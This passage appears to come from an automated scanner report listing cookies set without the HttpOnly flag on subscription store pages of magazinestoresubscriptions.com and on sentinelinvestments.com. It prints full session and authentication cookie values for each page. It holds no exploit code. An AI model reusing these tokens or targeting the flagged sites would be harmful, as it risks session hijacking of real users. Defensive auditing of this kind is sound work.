WC_GENERIC_ACTIVITYDATA=[16419605%3atrue%3afalse%3a0%3a6TUPgGq3ci7IPBw4tu5kSdECWw4%3d][com.ibm.commerce.context.base.BaseContext|10001%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|10001%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|4000000000000000001%264000000000000000001%26null%26%2d2000][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null]; Path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

11.7. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_Brides previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://www.magazinestoresubscriptions.com
Path:	/webapp/wcs/stores/servlet/Subscriptions_Brides

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

JSESSIONID=00004nur2b4AB8GyjoBhBXHJFNN:12jnveaj2; Path=/
WC_AUTHENTICATION_-1002=%2d1002%2cRH6gD%2bXy5DpzRjiDAyHRFYiJ7VI%3d; Path=/; Secure
WC_ACTIVEPOINTER=%2d1%2c10001; Path=/
WC_USERACTIVITY_-1002=%2d1002%2c10001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZzMyIJZot6Wq%2fcnmapee%2f0d6JbmYYi7b5mFcJATVbwKgg2xKrPiE8bljyvYeFRC0dSpvHcG0I0Za%0aN8I5U1fIm%2bVXFNkHZc7mzEyRNk9R93bc3Z%2bj3WRLr%2f%2fLUA4vR9PWa%2b%2fqrTv2%2bGU%3d; Path=/
WC_GENERIC_ACTIVITYDATA=[16419602%3atrue%3afalse%3a0%3aA5S73L%2bBXNF58pGv%2flPBhYu4lts%3d][com.ibm.commerce.context.base.BaseContext|10001%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|10001%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|4000000000000000001%264000000000000000001%26null%26%2d2000][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null]; Path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

11.8. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_CondeNastPortfolio previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://www.magazinestoresubscriptions.com
Path:	/webapp/wcs/stores/servlet/Subscriptions_CondeNastPortfolio

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=0000MTLmULOAO5VhhPygy4Acrs9:12jr714ca; Path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.9. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_CondeNastTraveler previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://www.magazinestoresubscriptions.com
Path:	/webapp/wcs/stores/servlet/Subscriptions_CondeNastTraveler

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

JSESSIONID=0000DEGztK4KuU8jzcAvA-zQ_sb:12jnveaj2; Path=/
WC_AUTHENTICATION_-1002=%2d1002%2cRH6gD%2bXy5DpzRjiDAyHRFYiJ7VI%3d; Path=/; Secure
WC_ACTIVEPOINTER=%2d1%2c10001; Path=/
WC_USERACTIVITY_-1002=%2d1002%2c10001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZzMyIJZot6Wq%2fcnmapee%2f0d6JbmYYi7b5mFcJATVbwKgg2xKrPiE8bljyvYeFRC0dSpvHcG0I0YF%0a57LJD52VFrIOn1bSX%2fQv09%2bRP8hqpL9gI8glNNCvaGm3LmA3Rod42Mm2tHMtlbM%3d; Path=/
WC_GENERIC_ACTIVITYDATA=[16419613%3atrue%3afalse%3a0%3aRsNgMu8ZswVr2yV3hDnh86UdQV4%3d][com.ibm.commerce.context.base.BaseContext|10001%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|10001%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|4000000000000000001%264000000000000000001%26null%26%2d2000][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null]; Path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

11.10. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_Details previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://www.magazinestoresubscriptions.com
Path:	/webapp/wcs/stores/servlet/Subscriptions_Details

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

JSESSIONID=0000zj5CriHITh3Pg1Mh5DZbRfE:12jnveaj2; Path=/
WC_AUTHENTICATION_-1002=%2d1002%2cRH6gD%2bXy5DpzRjiDAyHRFYiJ7VI%3d; Path=/; Secure
WC_ACTIVEPOINTER=%2d1%2c10001; Path=/
WC_USERACTIVITY_-1002=%2d1002%2c10001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZzMyIJZot6Wq%2fcnmapee%2f0d6JbmYYi7b5mFcJATVbwKgg2xKrPiE8bljyvYeFRC0dSpvHcG0I0YS%0ao3Xdx2qkaVDxuC3UboHigZndhxzkaCnU0SpqoYzOdQi9%2byvcsP9hI3YzV%2bKI6%2bA%3d; Path=/
WC_GENERIC_ACTIVITYDATA=[16419618%3atrue%3afalse%3a0%3aWmgETUm9LlNs4rLQTSOMj7IzaB0%3d][com.ibm.commerce.context.base.BaseContext|10001%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|10001%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|4000000000000000001%264000000000000000001%26null%26%2d2000][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null]; Path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

11.11. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_ElegantBride previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://www.magazinestoresubscriptions.com
Path:	/webapp/wcs/stores/servlet/Subscriptions_ElegantBride

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=00003mw4fmwQBidF23NiJkaoStU:12jnveaj2; Path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.12. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_GQ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://www.magazinestoresubscriptions.com
Path:	/webapp/wcs/stores/servlet/Subscriptions_GQ

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

JSESSIONID=0000K8AjziO3qYOdmYpv17Si2wk:12jnveaj2; Path=/
WC_AUTHENTICATION_-1002=%2d1002%2cRH6gD%2bXy5DpzRjiDAyHRFYiJ7VI%3d; Path=/; Secure
WC_ACTIVEPOINTER=%2d1%2c10001; Path=/
WC_USERACTIVITY_-1002=%2d1002%2c10001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZzMyIJZot6Wq%2fcnmapee%2f0d6JbmYYi7b5mFcJATVbwKgg2xKrPiE8bljyvYeFRC0dSpvHcG0I0YY%0a3oIHkEKIKs9o38uGG7kfp27zsKCrzdwCfVBZPklGPhUU1l2AYQ5kNDxv1fiDpfo%3d; Path=/
WC_GENERIC_ACTIVITYDATA=[16419713%3atrue%3afalse%3a0%3aoNunPdPRwDso5BWF0B3DMK%2b7aGY%3d][com.ibm.commerce.context.base.BaseContext|10001%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|10001%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|4000000000000000001%264000000000000000001%26null%26%2d2000][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null]; Path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

11.13. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_Glamour previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://www.magazinestoresubscriptions.com
Path:	/webapp/wcs/stores/servlet/Subscriptions_Glamour

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

JSESSIONID=0000k9muvhPT2T0QGomWys1qLJF:12jnveaj2; Path=/
WC_AUTHENTICATION_-1002=%2d1002%2cRH6gD%2bXy5DpzRjiDAyHRFYiJ7VI%3d; Path=/; Secure
WC_ACTIVEPOINTER=%2d1%2c10001; Path=/
WC_USERACTIVITY_-1002=%2d1002%2c10001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZzMyIJZot6Wq%2fcnmapee%2f0d6JbmYYi7b5mFcJATVbwKgg2xKrPiE8bljyvYeFRC0dSpvHcG0I0Yx%0a6YXYjEo1VspU94VyYifd4b8UwcK0sAJJnDw3uxHAP2B5jfTIt7CKmPmh5LMseU4%3d; Path=/
WC_GENERIC_ACTIVITYDATA=[16419654%3atrue%3afalse%3a0%3ayk4TdxcyqY8lQetDPXzNMpgXQ3Y%3d][com.ibm.commerce.context.base.BaseContext|10001%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|10001%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|4000000000000000001%264000000000000000001%26null%26%2d2000][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null]; Path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

11.14. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_GolfDigest previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://www.magazinestoresubscriptions.com
Path:	/webapp/wcs/stores/servlet/Subscriptions_GolfDigest

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

JSESSIONID=0000LLoThJrjtgp0dh9gD0ACop5:12jnveaj2; Path=/
WC_AUTHENTICATION_-1002=%2d1002%2cRH6gD%2bXy5DpzRjiDAyHRFYiJ7VI%3d; Path=/; Secure
WC_ACTIVEPOINTER=%2d1%2c10001; Path=/
WC_USERACTIVITY_-1002=%2d1002%2c10001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZzMyIJZot6Wq%2fcnmapee%2f0d6JbmYYi7b5mFcJATVbwKgg2xKrPiE8bljyvYeFRC0dSpvHcG0I0Yv%0a6v0E%2bm809ThIzM6ea0oI8DywHeBeNGHjSsQGCNvkAgdRmcAW%2bzbsZ%2fEpEkjt6yQ%3d; Path=/
WC_GENERIC_ACTIVITYDATA=[16419689%3atrue%3afalse%3a0%3aYVf%2b5P0tc2ehV12Qvasx9%2fLJ0y0%3d][com.ibm.commerce.context.base.BaseContext|10001%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|10001%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|4000000000000000001%264000000000000000001%26null%26%2d2000][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null]; Path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

11.15. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_GolfWorld previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://www.magazinestoresubscriptions.com
Path:	/webapp/wcs/stores/servlet/Subscriptions_GolfWorld

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

JSESSIONID=0000IM4ZETA2C7Q0vENBBHplaqH:12jnveaj2; Path=/
WC_AUTHENTICATION_-1002=%2d1002%2cRH6gD%2bXy5DpzRjiDAyHRFYiJ7VI%3d; Path=/; Secure
WC_ACTIVEPOINTER=%2d1%2c10001; Path=/
WC_USERACTIVITY_-1002=%2d1002%2c10001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZzMyIJZot6Wq%2fcnmapee%2f0d6JbmYYi7b5mFcJATVbwKgg2xKrPiE8bljyvYeFRC0dSpvHcG0I0a8%0abtVlN3ZfToACmNCXnTZXNhHTUY5Da6by4HMXYXoBCmw4ZHIQ7kDdaGdpNFW9q8k%3d; Path=/
WC_GENERIC_ACTIVITYDATA=[16419703%3atrue%3afalse%3a0%3auJNeEFkCmLdxXCBhFMbGZFgwsxY%3d][com.ibm.commerce.context.base.BaseContext|10001%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|10001%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|4000000000000000001%264000000000000000001%26null%26%2d2000][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null]; Path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

11.16. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_Lucky previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://www.magazinestoresubscriptions.com
Path:	/webapp/wcs/stores/servlet/Subscriptions_Lucky

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

JSESSIONID=0000rGo_qi4_LyyOG_1Dh4EcyqB:12jr714ca; Path=/
WC_AUTHENTICATION_-1002=%2d1002%2cRH6gD%2bXy5DpzRjiDAyHRFYiJ7VI%3d; Path=/; Secure
WC_ACTIVEPOINTER=%2d1%2c10001; Path=/
WC_USERACTIVITY_-1002=%2d1002%2c10001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZzMyIJZot6Wq%2fcnmapee%2f0d6JbmYYi7b5mFcJATVbwKgg2xKrPiE8bljyvYeFRC0YlZQawo6a%2fCn%0aiwEK5mViBuug9h0Y9DHXOJ%2bFWWhqJ9zjJa36rFzEOjK7ezVaLZk6%2fmoed8gyVq0%3d; Path=/
WC_GENERIC_ACTIVITYDATA=[16420067%3atrue%3afalse%3a0%3ahpXIcrDhid5NuOwuZh%2ft4lVsrDY%3d][com.ibm.commerce.context.base.BaseContext|10001%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|10001%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|4000000000000000001%264000000000000000001%26null%26%2d2000][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null]; Path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

11.17. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_ModernBride previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://www.magazinestoresubscriptions.com
Path:	/webapp/wcs/stores/servlet/Subscriptions_ModernBride

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=0000EbGXc6gG6JG7do0YUFhxuVM:12jr714ca; Path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.18. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_NewYorker previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://www.magazinestoresubscriptions.com
Path:	/webapp/wcs/stores/servlet/Subscriptions_NewYorker

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

JSESSIONID=0000qk0-9EmVZgM9368A8xyvtbj:12jr714ca; Path=/
WC_AUTHENTICATION_-1002=%2d1002%2cRH6gD%2bXy5DpzRjiDAyHRFYiJ7VI%3d; Path=/; Secure
WC_ACTIVEPOINTER=%2d1%2c10001; Path=/
WC_USERACTIVITY_-1002=%2d1002%2c10001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZzMyIJZot6Wq%2fcnmapee%2f0d6JbmYYi7b5mFcJATVbwKgg2xKrPiE8bljyvYeFRC0YlZQawo6a%2fA%2f%0abexFhWTt47e5Mo%2bIUOGLFoXFbZibHImhZP%2fX9oVBOKGt8iW%2bkrypzCBA7zMsTD0%3d; Path=/
WC_GENERIC_ACTIVITYDATA=[16420142%3atrue%3afalse%3a0%3a5E6ldLW5ZALO1tR0oYibLGxRpq0%3d][com.ibm.commerce.context.base.BaseContext|10001%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|10001%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|4000000000000000001%264000000000000000001%26null%26%2d2000][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null]; Path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

11.19. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_Self previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://www.magazinestoresubscriptions.com
Path:	/webapp/wcs/stores/servlet/Subscriptions_Self

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

JSESSIONID=0000Dft1_pxBjhT64qTXywTQT1R:12jr714ca; Path=/
WC_AUTHENTICATION_-1002=%2d1002%2cRH6gD%2bXy5DpzRjiDAyHRFYiJ7VI%3d; Path=/; Secure
WC_ACTIVEPOINTER=%2d1%2c10001; Path=/
WC_USERACTIVITY_-1002=%2d1002%2c10001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZzMyIJZot6Wq%2fcnmapee%2f0d6JbmYYi7b5mFcJATVbwKgg2xKrPiE8bljyvYeFRC0YlZQawo6a%2fAE%0aGONswVFm2hpNJHAn604U%2ftoCUUE1BDFuNTRos3CBUAShEK4IkYeQeHazq%2bozYow%3d; Path=/
WC_GENERIC_ACTIVITYDATA=[16420087%3atrue%3afalse%3a0%3amBXTv1vHzAp04ze95g3yWJHphRs%3d][com.ibm.commerce.context.base.BaseContext|10001%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|10001%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|4000000000000000001%264000000000000000001%26null%26%2d2000][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null]; Path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

11.20. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_TeenVogue previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://www.magazinestoresubscriptions.com
Path:	/webapp/wcs/stores/servlet/Subscriptions_TeenVogue

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

JSESSIONID=0000G-x9BjqxoEAPW6PZDfPnvF5:12jr714ca; Path=/
WC_AUTHENTICATION_-1002=%2d1002%2cRH6gD%2bXy5DpzRjiDAyHRFYiJ7VI%3d; Path=/; Secure
WC_ACTIVEPOINTER=%2d1%2c10001; Path=/
WC_USERACTIVITY_-1002=%2d1002%2c10001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZzMyIJZot6Wq%2fcnmapee%2f0d6JbmYYi7b5mFcJATVbwKgg2xKrPiE8bljyvYeFRC0YlZQawo6a%2fBH%0aLqxAiny5LrVz%2bboJL8AQ0naDA20QdjfAXxC134f7Jz1m3YvhRQzvjNwXQt%2f68io%3d; Path=/
WC_GENERIC_ACTIVITYDATA=[16420099%3atrue%3afalse%3a0%3aYqj2GK49LEs6noC6BEQI39oGsjk%3d][com.ibm.commerce.context.base.BaseContext|10001%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|10001%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|4000000000000000001%264000000000000000001%26null%26%2d2000][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null]; Path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

11.21. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_VanityFair previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://www.magazinestoresubscriptions.com
Path:	/webapp/wcs/stores/servlet/Subscriptions_VanityFair

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

JSESSIONID=0000xw9XDCR-rSohWzeYpltKY-H:12jr714ca; Path=/
WC_AUTHENTICATION_-1002=%2d1002%2cRH6gD%2bXy5DpzRjiDAyHRFYiJ7VI%3d; Path=/; Secure
WC_ACTIVEPOINTER=%2d1%2c10001; Path=/
WC_USERACTIVITY_-1002=%2d1002%2c10001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZzMyIJZot6Wq%2fcnmapee%2f0d6JbmYYi7b5mFcJATVbwKgg2xKrPiE8bljyvYeFRC0YlZQawo6a%2fDL%0aRtcOX7vAUdLq6Hq4AWZJug3ter6Ve1vDGMgmhvF0ReSmeomwIBRyvlOp7VmTrkc%3d; Path=/
WC_GENERIC_ACTIVITYDATA=[16420151%3atrue%3afalse%3a0%3azcJlgswaOZvisfczfqgW4YNNQxo%3d][com.ibm.commerce.context.base.BaseContext|10001%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|10001%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|4000000000000000001%264000000000000000001%26null%26%2d2000][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null]; Path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

11.22. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_Vogue previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://www.magazinestoresubscriptions.com
Path:	/webapp/wcs/stores/servlet/Subscriptions_Vogue

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

JSESSIONID=000077AvQ5emcOSox5imPZuSXqf:12jr714ca; Path=/
WC_AUTHENTICATION_-1002=%2d1002%2cRH6gD%2bXy5DpzRjiDAyHRFYiJ7VI%3d; Path=/; Secure
WC_ACTIVEPOINTER=%2d1%2c10001; Path=/
WC_USERACTIVITY_-1002=%2d1002%2c10001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZzMyIJZot6Wq%2fcnmapee%2f0d6JbmYYi7b5mFcJATVbwKgg2xKrPiE8bljyvYeFRC0YlZQawo6a%2fAM%0a7ZiVQobgmG6AiURqTuhruWAd40Qhy2PGdMvGtTU6F1PZxSPdsjjJkMU9jkcblHU%3d; Path=/
WC_GENERIC_ACTIVITYDATA=[16420159%3atrue%3afalse%3a0%3ac4wFYold1FoX5flDzeXNYHnayJw%3d][com.ibm.commerce.context.base.BaseContext|10001%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|10001%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|4000000000000000001%264000000000000000001%26null%26%2d2000][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null]; Path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

11.23. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_W previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://www.magazinestoresubscriptions.com
Path:	/webapp/wcs/stores/servlet/Subscriptions_W

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

JSESSIONID=0000Vhby-bpIpWQ2UcIyMe80vlp:12jnveaj2; Path=/
WC_AUTHENTICATION_-1002=%2d1002%2cRH6gD%2bXy5DpzRjiDAyHRFYiJ7VI%3d; Path=/; Secure
WC_ACTIVEPOINTER=%2d1%2c10001; Path=/
WC_USERACTIVITY_-1002=%2d1002%2c10001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZzMyIJZot6Wq%2fcnmapee%2f0d6JbmYYi7b5mFcJATVbwKgg2xKrPiE8bljyvYeFRC0dSpvHcG0I0a9%0a20%2fejh7prtVltEMryh1brZCRsLLaPkaMe8Akhmqi39JY7u9vjrKp02H5AlUQE7E%3d; Path=/
WC_GENERIC_ACTIVITYDATA=[16419835%3atrue%3afalse%3a0%3aCFEfewzTmdxWTKG7j05ZJskj1Zs%3d][com.ibm.commerce.context.base.BaseContext|10001%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|10001%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|4000000000000000001%264000000000000000001%26null%26%2d2000][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null]; Path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

11.24. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_Wired previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://www.magazinestoresubscriptions.com
Path:	/webapp/wcs/stores/servlet/Subscriptions_Wired

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

JSESSIONID=0000kzU6rJKyKppPAMaRGuijmYh:12jr714ca; Path=/
WC_AUTHENTICATION_-1002=%2d1002%2cRH6gD%2bXy5DpzRjiDAyHRFYiJ7VI%3d; Path=/; Secure
WC_ACTIVEPOINTER=%2d1%2c10001; Path=/
WC_USERACTIVITY_-1002=%2d1002%2c10001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZzMyIJZot6Wq%2fcnmapee%2f0d6JbmYYi7b5mFcJATVbwKgg2xKrPiE8bljyvYeFRC0YlZQawo6a%2fDt%0aoJJmfmiKMqLpgwDfHCXGni13qTu0LfcLGqCDRlYqKtYD3XcqH1hYJGauy1R%2fYxU%3d; Path=/
WC_GENERIC_ACTIVITYDATA=[16420176%3atrue%3afalse%3a0%3a5KRoPYNZ6oweqAaKlufu18E0nIQ%3d][com.ibm.commerce.context.base.BaseContext|10001%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|10001%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|4000000000000000001%264000000000000000001%26null%26%2d2000][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null]; Path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

11.25. http://www.sentinelinvestments.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.sentinelinvestments.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

PHPSESSID=qmis707mdaq9bcgqjvjtrnmke6; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.sentinelinvestments.com

Response

HTTP/1.1 200 OK
